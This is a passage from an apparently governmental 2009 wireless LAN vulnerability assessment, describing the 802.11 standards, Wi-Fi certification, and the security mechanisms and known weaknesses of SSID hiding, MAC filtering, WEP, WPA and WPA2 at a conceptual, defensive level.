  • 26. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)2.4 IEEE 802.11 Standards2.4.1 BackgroundIn 1985, the U.S. Federal Communications Commission (FCC) decided to open the Industrial,Scientific, and Medical (ISM) bands, operating at 902 to 928MHz, 2.4 to 2.483GHz, and 5.725to 5.875GHz, for unlicensed public use. This not only fulfilled a demand for commercialcommunication, but it also sparked the development of WLAN technology. The Institute ofElectrical and Electronics Engineers (IEEE) established the 802.11 WLAN standard [1] in 1997in an attempt to standardize wireless LAN products utilizing the ISM band. This standard hassince been adopted by the International Organization for Standardization / InternationalElectrotechnical Commission (ISO/IEC).The IEEE 802.11 core specification addresses both the Physical (PHY) and Data Link layers ofthe Open Systems Interconnection (OSI) Basic reference model. The legacy standard proposedthree (mutually incompatible) implementations for the physical layer: IR pulse modulation, RFsignaling using FHSS, and RF signaling using DSSS. The most obvious difference between theWLAN and the traditional wired LAN is the physical medium for data transmission; there is nophysical wiring required for the 802.11 network.The IEEE 802.11 standard has several key amendments. Products compliant to the 802.11a, band g amendments are in common use today, with an increasing number of products based on the“Draft 2.0” release of 802.11n. Key specifications for each of these amendments can be found inTable 1.Historically, the first successful commercial 802.11 WLAN products were compliant with the802.11b standard. Both 802.11a and b amendments were actually adopted at the same time, butbecause 802.11b was less complex than 802.11a, products compliant with the 802.11b standardrapidly materialized while products under 802.11a only reached the market in 2002. Since thattime, the 802.11g amendment which utilized the same 2.4 GHz band as 802.11b, but deliveredfaster and more robust connections as well as greater range, has come to dominate the market.Although in terms of number of units sold, 802.11b products still comprise the majority of globalWLAN market; sales of 802.11g products are poised to surpass this.2.4.2 IEEE 802.11 Task Groups/Amendments2.4.2.1 GeneralCore standard 802.11 WLANs based on IR transport were never commercially implemented andthe RF-based versions suffered from low transmission speed (2 Mbps). The IEEE laterestablished several task groups to explore various improvements to the original 802.11 corestandard. May 2009 10
  • 27. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)2.4.2.2 802.11a AmendmentTask Group A explored the unlicensed 5.0 GHz frequency band, using Orthogonal FrequencyDivision Multiplexing (OFDM), working to achieve throughputs up to 54 Mbps. The 802.11aextension [2] was completed in 1999 and in 2002 vendors began releasing products compliant tothis extension. Because of the different operating band and modulation, the 802.11a standard isnot backward compatible or interoperable with the 802.11b standard. Several vendors aremarketing dual-band, multi-standard (802.11a and 802.11b/g) APs. The 802.11a is currentlylicensed for use in North America and most European countries; however commercial use of802.11a has historically been quite limited.Recently, 802.11a has enjoyed somewhat of a resurgence in popularity due to the developmentof enterprise mesh infrastructure networks. In such networks, 802.11a is used forcommunications between APs, and 802.11b/g is used for communications between AP andwireless clients.2.4.2.3 802.11b AmendmentTask Group B explored DSSS technology to boost data rates in the original 2.4 GHz band. The802.11b extension [3], published in September 1999, delivers raw data rates up to 11 Mbps,which gave data rate parity with the popular 10 Mbps “10Base” wired LAN systems of the day.The majority of WLAN systems in the market today follow the 802.11b standard and it isaccepted throughout North America, Europe and Asia.2.4.2.4 802.11g AmendmentTask Group G approved the development of the new extension to the 802.11 standard inNovember 2001; the resultant amendment was approved in 2003. The 802.11g operates at 2.4GHz with mandatory compatibility to 802.11b and uses the OFDM multicarrier modulationscheme to achieve a maximum data rate of 54 Mbps.2.4.2.5 802.11n AmendmentTask Group N is currently engaged in the development of the higher data rate extensions to the802.11 standard. As with 802.11b and g, the 802.11n standard will operate at 2.4 GHz withmandatory compatibility to 802.11b/g and uses OFDM with MIMO techniques to achieve amaximum projected data rate of 248 Mbps. As described earlier in this document,OFDM+MIMO utilizes the same basic modulation as 802.11g. However it utilizes multipletransceivers with advanced techniques to compensate for both the spatial and temporal variationsof the RF channel as well as the practice of “channel bonding” in order to greatly increase therange and raw data rate. The 802.11n is still in the draft stage with an expected final approval in2010, however many “Pre-N” or “Draft-N” products have already begun emerging on themarket. Consumers are cautioned when purchasing such products because, as draft-basedproducts, they are not subject to the same interoperability testing as full-standard compliantproducts. As such, they are not guaranteed to be compatible with, and may not be upgradeable,802.11 WLAN System Overview May 2009 11
  • 28. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)to the finalized release of the standard.2.4.2.6 802.11i AmendmentUnlike the previously listed amendments, 802.11i is not focused on RF technologies, frequenciesand data rates. Instead, Task Group I was tasked with addressing the security vulnerabilities inthe existing WEP security. Although work on 802.11i began in 2000, it was not ratified until2004. Recognizing a need to improve 802.11 WLAN security sooner rather than later, in 2001,the Wi-Fi Alliance developed an interim improved security standard based on a draft of 802.11i. This interim release was dubbed Wi-Fi Protected Access (WPA) and turned out to be largelycompatible with the finalized 802.11i, which was subsequently given the name Wi-Fi ProtectedAccess version 2 (WPA2). This is the name that the 802.11i is commonly known by today.WPA2 improves on the basic WEP security framework in several ways. Firstly, by addingimproved authentication (all authentication schemes allowed under the ExtensibleAuthentication Protocol (EAP), defined by RFC 3748, are supported by 802.11i, however mostcommercial products only support a limited number of modes: Enterprise authentication using aRADIUS server, and the pre-shared key mechanism carried over from WEP). Secondly, bysignificantly improving the strength of the cryptographic algorithms: 128-bit AES-CCMP is usedas the encryption algorithm in WPA2, which provides substantial security margin over the RC4,CRC-32 and “Michael” algorithms used previously in WEP and WPA.While WPA2/802.11i has addressed the majority of WEP deficiencies, one surprising criticismlevelled at WPA2 was its use of AES encryption, which although very strong, also significantlyincreased the processing requirements, which many devices utilizing slower microprocessorswere unable to fulfill. As a result, there still exist many devices on the market which onlyimplement the interim WPA standard with its reduced processing requirements and somewhatweaker security.2.4.2.7 Other 802.11 ExtensionsThere are many other 802.11 extensions dealing with various aspects of WLANs in progress orbeing planned. For example, 802.11e addresses wireless quality of service (QoS) concerns,802.11p and 802.11r address mobility use and roaming, 802.11s deals with ad-hoc meshnetworks, 802.11w is a proposed security-related amendment intended to address the remainingissue of network management information frames being transmitted without protection orencryption, and 802.11y which proposes to extend the use of 802.11 into the 3.7 GHz frequencyband. A full list of 802.11 amendments and working groups is available on the IEEE web site.2.5 Wi-Fi™ Interoperability Standard2.5.1 Wireless Ethernet Compatibility Alliance (WECA) and the Wi-Fi AllianceManufacturers often include proprietary features that render their products incompatible withthose of other companies. To address this concern, several manufacturers founded WECA in May 2009 12
  • 29. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)1999. WECA defined a test suite [5] to ensure interoperability of 802.11b products and correctimplementation of WEP. This was soon expanded to include interoperability suites for 802.11gand WPA. In 2002, WECA changed its name to the Wi-Fi Alliance, and at the time of writing,the Wi-Fi Alliance has over 320 industry and affiliate members.Products that pass these tests are deemed to be Wi-Fi (Wireless Fidelity) compliant and arepermitted to display the logo. The popular backing of Wi-Fi™ has enabled the 802.11b/gfamily of products to dominate the WLAN market.Although often used interchangeably in the media, the terms 802.11 and Wi-Fi™ are notsynonymous. The IEEE 802.11 standard contains amendments dealing with all aspects ofWLANs and the 802.11a/b/g/n amendments in particular are PHY and Medium Access Control(MAC) layer specifications whereas Wi-Fi™ is an only interoperability certification for802.11a/b/g products. Originally, Wi-Fi was intended to refer only to 2.4 GHz interoperableproducts, and a Wi-Fi5™ designation was created for certifying 5 GHz band 802.11a WLANproducts, however with the increasing prevalence of dual-band products supporting both 2.4GHzand 5 GHz standards, the certification was unified to a single Wi-Fi certification. At the time ofwriting, the following mandatory aspects are covered: 1. Radio standards for 802.11a, b, g, including multi-band support 2. Security implementation: WEP, WPA, WPA2 3. Authentication implementation: EAPThe Wi-Fi Alliance also offers optional certification programs for: 1. Product interoperability for 802.11n Draft 2.0 2. Validation of “easy setup” security features 3. Multimedia-over-Wi-Fi features 4. Low-Power Wi-Fi for multimedia applications 5. Combined Wi-Fi + cellular devices (this certification is mandatory for combined devices seeking CTIA certification)It is important to note that although products may be Wi-Fi certified, this only refers to operationwithin the strictures of the specific 802.11 standards. Devices may still contain non-standard,proprietary operating modes which are not covered by the Wi-Fi interoperability requirements(e.g., the “enhanced” 104 Mbps data rate of many commercial 802.11 devices are not compliantwith the official 802.11 standards and such modes are generally NOT compatible orinteroperable between vendors, and indeed, may employ practices that actually interfere withproper operation of strictly standards compliant devices which are located within commontransmission range). Users are further cautioned to check for compliance with Industry Canadaregulations before utilizing these non-standard modes, as some non-standard modes of operation802.11 WLAN System Overview May 2009 13
  • 30. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)are known to interfere with operation of other 802.11-based networks in the vicinity. May 2009 14
  • 31. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) This page intentionally left blank.802.11 WLAN System Overview May 2009 15
  • 32. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)3 Security Mechanisms3.1 GeneralWith any network, security is an important consideration. Unauthorized access can result insensitive information disclosure, data modification, denial of service and illicit use of resources.Once an unauthorized user has gained access to the network, monitoring of the now unprotecteddata can lead to user names and passwords being intercepted, which can then be used for furtherattacks. WLANs are subject to all the security issues normally faced with conventional wiredLANs, but additionally, they suffer from vulnerabilities directly associated with the use ofwireless connectivity. The nature of the wireless medium makes it practically impossible toconfine the radio signals to a controlled area. These radiated signals are subject to clandestineinterception and exploitation. In a traditional wired LAN environment, the physical security ofthe workplace provides some protection for the LAN as the users need to physically connectwires to the network to access its resources. In a WLAN environment, this protection is nolonger enough since a wireless network can be accessed remotely from a distance without theneed for a physical connection: anyone using compatible wireless equipment can potentiallyaccess the LAN.To mitigate these security concerns, encryption is used in an attempt to make the signal unusableby unauthorized parties if intercepted. However, as in most commercial products, ease-of-use forthe consumer is the primary concern To this day, the majority of 802.11 WLAN productstypically have all encryption options and security features turned off by default, or, where theyare enabled, devices will typically use the simplest and weakest encryption scheme available.3.2 Access Control3.2.1 GeneralAccess control is a fundamental requirement for any sensitive network. However, the accesscontrol mechanisms specified in the IEEE 802.11 standard are weak. The following twomechanisms, although often promoted as security features, are intended more as an interferenceprevention measure rather than access control measures.3.2.2 Service Set Identifier (SSID)APs send out beacon messages to announce their presence and operating parameters to clients.The SSID is part of this beacon message that declares the AP’s identity to the network. A clientlooking for a specific network to join would scan for this SSID and when the network isdiscovered, the authentication process begins. By turning off the broadcast of this SSID, clientswould not be able to automatically identify and associate with the AP, but would instead requirepre-knowledge of the SSID. Unfortunately, this mechanism fails as a security feature becausealthough the SSID is no longer broadcast on the beacon, it is still sent out in other networkmanagement traffic, which can be sniffed by an attacker.Security Mechanisms May 2009 17
  • 33. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)3.2.3 MAC Address Access Control List (ACL)Some vendors implement a MAC Address (i.e., Ethernet address) filter or ACL to preventunauthorized access to an AP. MAC addresses of authorized clients are entered and stored in alist internal to the AP, and only clients with MAC addresses matching this list are allowed accessto the AP (alternately, certain MAC addresses may be blocked instead). This is similarlyineffective as a security measure because all traffic sent over the network contains the MACaddress in the unencrypted header. Therefore, by capturing just a single packet and examiningits header, an attacker can determine a legitimate MAC address and program his device with thisaddress. Further, the process of manually maintaining a list of all permitted MAC addresses istime consuming and error-prone making it only practical for small and fairly static networks.3.3 Authentication Services3.3.1 GeneralUnlike wired LANs, WLANs transmit over a medium without physical bounds. The IEEE802.11 standard provides access control via the authentication service. All wireless devices usean authentication mechanism to establish their identity prior to association. Association ofwireless devices is established only if the authentication is accepted. Authentication can beperformed between two devices or between a device and an AP. The IEEE 802.11 core standarddefines two types of authentication methods: Open System and Shared Key. The Wi-FiAlliance’s WPA standard and the 802.11i/WPA2 standards add additional authentication modesand IEEE 802.1X authentication using the Extensible Authentication Protocol (EAP) is alsosupported as an optional extension to all native authentication modes.It is important to note that the native authentication methods authenticate the devices; they donot authenticate the users of the devices. Further, in an infrastructure configuration,authentication is not mutual. Only the wireless client device must prove its identity; the AP isimplicitly trusted and there is no way for a client to verify that an AP is legitimate. The use ofadditional 802.1X authentication can be used to address these issues but requires the use of adedicated RADIUS or other authentication server and associated infrastructure to support theadditional authentication layer.3.3.2 Open System AuthenticationThe Open System provides identification only and is essentially a “null” authentication. A clientrequesting access to an AP simply sends its MAC address to the AP, and the AP replies with anauthentication verification message: any client who requests authentication with this algorithmwill be authenticated. This mode of authentication is implemented where ease-of-use is theprimary concern or when security is not an issue for a network administrator. It is important tonote that Open System authentication is the default setting in many 802.11 WLAN devices.The 802.11 standard allows for use of WEP encryption even with open system authentication- inthis case, both devices must share a WEP key, but unlike the “Shared Key Authentication” May 2009 18
  • 34. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)described in the next section, the key is not used for authentication, only for encryption. In thismode, a client is authenticated using open system authentication and then both ends immediatelybegin WEP-encrypted communications. This mode is actually considered somewhat moresecure than shared key authentication because key-related information is not exchanged over theair.3.3.3 Shared Key AuthenticationShared Key authentication is a feature of the original 802.11 standard and can only be used if thelegacy wireless security features of the device are enabled. It does not apply when WPA orWPA2/802.11i is in use, where a similar but somewhat stronger “Pre-Shared Key” scheme isavailable.In this mode, the secret shared key is manually distributed and configured on all participatingstations. The Shared Key authentication process follows a challenge-response scheme where theencryption/decryption is performed using WEP’s RC4 Pseudo-Random Number Generator(PRNG) to validate the challenge-response. After a “success” message is received, the link isconsidered authenticated. Note that the 802.11 standard also allows for shared key authenticationwithout link encryption, but virtually all consumer 802.11 WLAN devices will turn on linkencryption by default if shared-key authentication is used.The Shared Key authentication method was intended to provide a greater degree of securitycompared to the Open System authentication; however, weaknesses in the WEP encryption usedin the challenge-response scheme can allow the key to be easily recovered if this exchange isintercepted by an attacker. As well, it must be noted again, that this authentication onlyconfirms the identity of the hardware not that of the user. Therefore, individuals gainingunauthorized access to wireless devices registered for use on a network can potentially gainaccess to the network. Because of this, the previously described method of using Open SystemAuthentication with WEP encryption is actually the preferred mode of operation if no strongerauthentication and encryption measures (e.g. WPA/WPA2) are available. However, adequateuser authentication is also essential no matter which mode is chosen.802.11 does not specify any key management processes or mechanisms, therefore ensuring thesecurity of Shared Keys is the responsibility of the user. As with any passphrase-based system,strong passphrases should be chosen to minimize the possibility of password guessing, andshould be changed regularly.3.3.4 802.1X AuthenticationBoth the WPA and the WPA2/IEEE 802.11i amendment specify the mandatory use of anotherstandard, IEEE 802.1X, for network authentication. 802.1X is an Ethernet standard (IEEE 802.1family; it is not wireless LAN specific) that provides a framework for authentication, on top ofwhich various methods (such as passwords, smart cards, certificates, etc) can be used to verifyidentity. 802.1X works at the MAC layer to restrict network access to authorized entities.Network connectivity is provided through the concept of ports, each of which represents anSecurity Mechanisms May 2009 19
  • 35. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)association between a client station and an access point. Further, the standard specifies threeentities involved in the authentication transaction: the supplicant, the authenticator and theauthentication server. A supplicant (wireless client) is an entity that desires to use a serviceoffered via a port on the authenticator (wireless access point). On a typical network, there maybe many ports available through which a supplicant may authenticate for service. Theauthentication server is the entity that verifies the identity of the supplicant that was submitted tothe authenticator, and directs the authenticator to allow access if the verification was successful.The IEEE 802.1X standard utilizes the Extensible Authentication Protocol (EAP) to permit avariety of authentication mechanisms to be used. Like the legacy Shared Key authentication,EAP is similarly based on a challenge-response scheme utilizing four distinct messages types:EAP Request, EAP Response, EAP Success and EAP Failure. EAP is considered “extensible”because these messages may be used to encapsulate virtually any authentication mechanism,although in practice, only a limited set of protocols is supported by commercial WLANequipment. In EAP-based authentication, initially, the EAP Request message is sent to asupplicant, indicating a challenge to which the supplicant responds with the EAP Responsemessage. Depending on the specific authentication method used, this challenge-responseexchange may be repeated several times and in both directions (allowing mutual authenticationto take place) to exchange authentication data until either an EAP Success or EAP Failure is sentto allow or deny the connection request.Use of 802.1X authentication has the potential to greatly increase the security of any LANinstallation, especially since the authentication method can be geared towards individual userauthentication vs. device authentication, which is recommended to be used wherever possible.Note however that in most cases, a network utilizing 802.1X authentication requires theinstallation of dedicated infrastructure in the form of the authentication server (RADIUS server). Additionally, even when using server-based authentication, it is important to select a methodthat addresses the necessary security requirements as not all EAP methods are created equal.Methods are available that integrate with PKI-infrastructure, two-factor authentication usingtokens, etc, however most devices support at least the EPA-TLS method based on the TransportLayer Security (TLS) protocol.As described earlier, both WPA and WPA2/802.11i implement a Pre-Shared Key authenticationscheme that does not require an external authentication server and is intended for home or smallnetwork use. Like the legacy Shared Key authentication, it relies on a challenge responsederived from a shared key in order to authenticate a device. The PSK mechanism uses a “4-wayhandshake” based on 802.1X exchanges and is much stronger than the legacy RC4-basedchallenge-response; however it is still vulnerable to attack if a weak passphrase is chosen.Additionally, the use of the PSK mode of authentication suffers from the same issues as thelegacy mechanism, namely those of key management and device vs. user authentication. May 2009 20
  • 36. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)3.4 Data Confidentiality and WEP/WPA/802.11i/WPA23.4.1 GeneralThe IEEE 802.11 core standard specifies an optional data confidentiality mechanism using theWEP protocol. It is intended to provide protection for a WLAN from casual unauthorizedeavesdropping and to ensure data integrity. Since its release, the WEP protocol has been provento exhibit many weaknesses, resulting in the development of stronger security and dataconfidentiality measures. As documented earlier, IEEE 802.11 working group I was formed totackle this task. Due to the long process, the Wi-Fi Alliance released an interim standard knownas Wi-Fi Protected Access (WPA) which was based on an early draft of the eventual 802.11istandard content. Because the two improved security standards turned out to be largelycompatible, 802.11i was also adopted by the Wi-Fi Alliance and came to be known as Wi-FiProtected Access version 2 (WPA2). Although WEP/WPA/WPA2 are strictly optional withinthe 802.11 standard, they are requirements for Wi-Fi™ compliance certification.3.4.2 Wired Equivalent Privacy (WEP) Protocol3.4.2.1 Properties of WEP ProtocolWEP employs the RC4 PRNG algorithm by RSA Data Security, Inc. RC4 is a stream cipheralgorithm developed in 1987 by Ronald Rivest. The RC4 algorithm uses a variable sizedsymmetric key independent of the plaintext to produce the ciphertext. The WEP protocol wasdesigned to be: a. Reasonably strong (difficult to break through brute-force attack); b. Self-synchronizing (WEP is self-synchronizing for each message); c. Computationally efficient (may be implemented in hardware or software); d. Exportable to all countries; and e. Optional in use (however implementation is required for an 802.11 Wi-Fi™ compliant product).3.4.2.2 WEP Operation TheoryThe RC4 stream cipher operates by expanding a secret key and a public 24-bit InitializationVector (IV) concatenated to a pre-shared key (generally, the same key used for theauthentication stage) into an arbitrarily long keystream of pseudo-random bits. Encryption isachieved by performing an exclusive OR (XOR) operation between the keystream and theplaintext to produce the ciphertext. Decryption is done by generating the identical keystreambased on the IV and secret key and XORing it with the ciphertext to produce the plaintext.Details of the WEP operation can be found in the IEEE 802.11 standard [1].Many 802.11b vendors produce products that support 40-bit and 104-bit WEP. Some vendorsrefer to the 40-bit version as “64-bit WEP” and the 104-bit variant as “128-bit WEP”. Thisdiscrepancy comes from the fact that although the 40-bit secret key and 24-bit IV areSecurity Mechanisms May 2009 21
  • 37. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)concatenated to make up 64-bits, the 24-bit IV is sent in the clear, thereby reducing theeffectiveness to only 40 bits. Similarly, 128-bit WEP is actually 104 bits of secret key plus the24-bit IV. Several 802.11a vendors have added more non-standard WEP lengths, for example,one popular brand of 802.11 appliance features a 152-bit or “True-128-bit” WEP which consistsof a 24-bit IV and a full 128-bit key, and another brand offers “256-bit WEP” (in this case, only232-bit due to IVs). Readers are cautioned that such modes require matched hardware andsoftware at both the AP and the wireless client in order to function, and due to weaknesses in theWEP algorithm, these longer key lengths are not considered any more secure than the basicversion. Only 40-bit WEP is specified in the 802.11b standard and the Wi-Fi™ requirements.The other WEP lengths are uncertified industry add-ons that may or may not be well-implemented from a security perspective.Theoretical weaknesses in WEP were pointed out by Walker [8, 7] as far back as 2000, and thefirst practical attacks against WEP appeared in 2001 [9], demonstrating that WEP is not a robustprotection mechanism. WEP suffers from important weaknesses that can provide opportunitiesfor disclosures of information, unauthorized access to the network and denials of service attacks. Because of these vulnerabilities, WEP is ineffective as a primary security measure and the useof WEP is not recommended for the protection of any Government of Canada data. It isimperative that older equipment which does not support stronger security than WEP be replacedor upgraded.3.4.3 Wi-Fi Protected Access (WPA)The Wi-Fi Protected Access (WPA) system was created by the Wi-Fi Alliance in an attempt toaddress the security vulnerabilities in WEP. WPA was an intermediate measure to take the placeof WEP while the official 802.11i standards were being developed. WPA was in fact based onan early draft of the 802.11i standard, with key frame information elements intentionallychanged to avoid the possibility of conflicts between WPA and the eventual 802.11i release.The goals of WPA were largely the same as for WEP; improved security was the main objective,but the new scheme had to be supported on the existing hardware base. To do this, RC4 wasretained as the data stream cipher due to its low processing requirements, but “wrapped” to coverthe insecurities of WEP.Several major improvements were made in WPA to improve security. A full 128-bit secret keyand a larger 48-bit initialization vector (IV) was used- separate individual keys are used in eachdirection as well as for integrity validation and a new key scheduling process known as theTemporal Key Integrity Protocol (TKIP) was added. TKIP continuously and dynamicallychanges these keys as the system operates and combined with the longer IV, defeats the keyrecovery vulnerabilities present in WEP.Related to TKIP, key security was improved in two ways. Firstly, when the Pre-Shared Keymode is in use, by eliminating the practice of using the shared key and public IV directly as amaster encryption key (same key used for all operations in both upstream and downstreamdirections) as was done in WEP. Instead, in WPA, a Pairwise Master Key (PMK, which, in this May 2009 22
  • 38. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)mode, is the same as the shared key) is combined with other data exchanged duringauthentication in a procedure known as the 4-Way Handshake, to derive a session-specificPairwise Transient Key (PTK) which in turn drives the TKIP dynamic key generation (as well askey generation for other related WPA services). Note, however, that this does not solve any ofthe PSK distribution and management issues with using this mode of operation. Secondly,where an 802.1X authentication server is used, the server will generate a random PMK instead ofusing a fixed key, further improving security.In addition to authentication and encryption changes, WPA also improved the security aroundmessage integrity. The weak 32-bit cyclic redundancy check (CRC32) used in WEP wasreplaced by a somewhat stronger, key-based message integrity code (MIC) and also a framecounter to prevent replay attacks. Although better than the CRC32 at error detection, the MICalgorithm (called “Michael”) used in WPA is still considered cryptographically weak since it,like the CRC32, is an invertible algorithm that was designed to be able to run on older hardwareplatforms with limited processor capacity. WPA therefore also implements a MIC spoofingcountermeasure which is supposed to disable the wireless connection for one minute if more thantwo frames that fail the MIC integrity check are detected in a one minute interval.Unfortunately, because the system is wireless and subject to RF interference, the occasionalnoisy frame can still pass all the simpler integrity checks and trigger the MIC check, causing ashutdown of the network; intentional denial-of-service attackers can also take advantage of thismechanism. For this reason, some commercial devices may not implement this countermeasureor allow it to be turned off, which somewhat increases the risk of a spoofing attack, but improvesoverall network robustness.3.4.4 IEEE 802.11i/Wi-Fi Protected Access version 2 (WPA2)The official IEEE-endorsed security improvement standard 802.11i was not ratified until 2004and being backward compatible with the interim WPA standard, came to be known also asWPA2. As of 2006, all commercial products that wish to be Wi-Fi certified must support WPA2security measures.WPA2 continues to support the simple Pre-Shared Key (PSK) mode of operation which cancomplicate key management and distribution issues if there is even a moderate population ofwireless users. As with WPA, 802.1X Extensible Authentication Protocol (EAP) is supported;however the Wi-Fi Alliance now requires validation for a wider range of 802.1X EAP methodsunder WPA2 in its certification program.Of primary significance in WPA2 is the introduction of an AES-based encryption algorithmknown as CCMP or “Counter-mode with CBC-MAC Protocol”, which is a cipher-block chainingmode of 128-bit AES with integrated message integrity checking (64-bit MAC), as well as acounter for protection against packet replay attacks.Note that the WPA2 definition still supports the old RC4/TKIP/Michael mechanisms forbackwards compatibility, but when CCMP encryption is enabled, it completely replaces theseolder mechanisms for much stronger ones and addresses the weaknesses in many of the WPASecurity Mechanisms May 2009 23
  • 39. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)mechanisms: CCMP is now used to strengthen phases of authentication and key exchange andthe weak Michael algorithm is superseded by the integral CBC-MAC in CCMP. These and othermeasures introduced in WPA2 comprise the new 802.11i Robust Security Network (RSN)architecture, which largely address the flaws in previous wireless network standards. It shouldbe noted for Government of Canada users that AES-CCMP is a GC-approved mechanism forsecuring up to Protected B data, and if the use of WLAN is supported by an appropriate threat-risk assessment, use of WPA2 is mandatory for GC WLANs (in the USA, NIST similarlyrequires the use of CCMP for securing Federal agencies’ IEEE 802.11-based WLANs) [21].Finally, WPA2 optionally allows the use of another AES-based encryption mechanism calledWRAP (Wireless Robust Authenticated Protocol). This was the original mechanism chosen bythe 802.11i committee, and uses AES in the OCB (Offset Code Book) mode, which is consideredslightly stronger than the CCMP mode. However, it was abandoned in favour of the CCMPmode due to intellectual property issues and the possibility of incurring licensing fees. May 2009 24
  • 40. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)4 Vulnerabilities4.1 Access Control Vulnerabilities4.1.1 GeneralThe 802.11 standard does not adequately address access control. The following two featuresoffer limited forms of access control.4.1.2 SSIDThe SSID is used for identifying the network, not as a security measure. Unfortunately, the useof a SSID is often mistaken as a password protection. The SSID contained in the beacon frame isalways sent in plaintext, regardless of the deployment of the WEP option. Any wireless client,malicious or not, can listen for this beacon to obtain the SSID and bypass this low level accesscontrol.4.1.3 MAC Address Access Control List (ACL)Some 802.11 vendors offer a MAC Address ACL feature that provides minimal access controlby limiting access to only authorized wireless cards. Unfortunately, the packets containing theMAC addresses are sent in clear text and the entries on the ACL can be easily obtained throughtraffic monitoring. An unauthorized user can spoof these MAC addresses and try to gain accessto the AP. Most of the time, the AP has the factory configuration for the administrator usernameand password. When the unauthorized user has accessed the AP, the configuration of the AP canbe changed.4.2 Authentication Mechanism Vulnerabilities4.2.1 GeneralThe authentication mechanism defined in the 802.11 is used to bring the wireless link up to theassumed physical standards of a wired link. There are vulnerabilities present in both the designand the implementation of the service.4.2.2 Shared Key Authentication FlawThe Shared Key authentication mechanism is used before an association is allowed. During thechallenge-response sequence, both the plaintext challenge and the encrypted challenge aretransmitted. This is a potential security vulnerability since it allows for discovery of the key andthe IV pair used for the authentication sequence. The 802.11 standard recommends avoidingusing the same key and IV pair for the next frame transmitted but there is no guarantee thatimplementations follow this recommendation. For this reason, as noted earlier in this document,using Open System Authentication along with WEP is generally considered more secure as key-related information is not transmitted.Vulnerabilities May 2009 25
  • 41. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)4.2.3 802.1X/EAP VulnerabilitiesFirst introduced in WPA, the 802.1X framework has the potential to greatly improve theauthentication capabilities of 802.11 wireless networks. Ironically, the authentication protocolspecified by 802.1X is vulnerable to attack primarily due to its inability to authenticate its ownmessages. Because of this flaw, EAP messages may be forged in a man-in-the-middle scenario,potentially allowing an attacker to bypass an authentication mechanism or to hijack an 802.11session. [20]4.3 WEP Vulnerabilities4.3.1 GeneralNumerous reports and articles [6,7,8,9,10,11] have been published about the securityvulnerabilities of the implementation of WEP. These reports focus on the minimal securityoffered by the WEP protocol, in particular, the following weaknesses:a. High probability of key re-use due to the short IV (On a busy network, IV re-use occurs often enough that the hacker may obtain the key in minutes to hours);b. Weak message authentication due to the short key length used; andc. Lack of a key management specification.4.3.2 Keystream Re-useBased on the use of a relatively short 24-bit IV, it is highly likely that over a short period of timeon an active wireless network, the IV will be re-used. This could facilitate an attack on thesystem to recover the plaintext [7]. This vulnerability exists regardless whether 64-bit or 128-bitWEP is used.4.3.3 Message IntegrityThe CRC-32 checksum is used to ensure the integrity of the packets during transmission. It ispossible for controlled changes to be made to ciphertext without changing the checksumappended to the message and to inject messages without detection [9].4.3.4 Key ManagementThe distributed shared key is the weakest aspect of the system. By using static shared keys,distributed among all the clients as “passwords,” the number of users aware of these keys willgrow as the network expands. This creates the following problems:a. Shared key among many people does not stay secret for long;b. The manual distribution of shared key can be time consuming, especially in a large environment with many users. Quite often, this results in key not being changed as frequently as required; and May 2009 26
  • 42. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)c. The frequency of IV re-use increases as the network size expands, which makes it more vulnerable to attack.4.4 WPA/WPA2 Vulnerabilities4.4.1 GeneralWPA and WPA2 have introduced measures designed to address the major vulnerabilities ofWEP, however a few new vulnerabilities were introduced and some vulnerabilities remain,particularly in WPA because of the requirement for backwards compatibility, and low computerequirements.4.4.2 Key ManagementAlthough 802.1X authentication support was made mandatory in WPA/WPA2, its use requiresan external authentication server and so the user is given an option to use a simple pre-sharedkey mechanism like WEP. Unfortunately, as with WEP, the pre-shared key authenticationmechanism for both WPA and WPA2 is vulnerable to key management issues: it is virtuallyimpossible to keep a single shared key secret among a large community, and re-keying anddistributing new keys for a large community is likewise difficult.4.4.3 4-Way Handshake and Weak Passphrase VulnerabilityThe Pre-Shared Key mechanism allows the use of security features in WPA/WPA2 in situationswhere the additional 802.1X infrastructure is not available. As with the shared key in WEP, allusers share a common “secret key”. Although the Pre-Shared Key is used as the Pairwise MasterKey (PMK) in WPA/WPA2, unlike WEP, the WPA shared key is not used directly as anencryption key, but is instead combined with other session-specific information exchangedduring the 4-Way Handshake, to generate a Pairwise Transient Key (PTK), which is in turn usedto generate dynamic encryption and message integrity keys.Although the short key and IV re-use issue has been resolved by this mechanism, a pre-sharedkey in WPA/WPA2 is now vulnerable to dictionary attacks. By capturing the 4-WayHandshake authentication exchange and using this information along with a dictionary file it ispossible to successfully guess the session keys if the Pre-Shared Key is one of the words in thedictionary; if the shared key is short or very simple, it may even be found through a brute-forcesearch. A successful dictionary attack can lead to two scenarios: recovered session keys can beused to eavesdrop on or disrupt an ongoing session, or the recovered PSK can be used to initiatea new session and allow unauthorized use of the network resources. If this mechanism must beused, it is imperative that a long, non-dictionary passphrase be used to secure the access point.Vulnerabilities May 2009 27
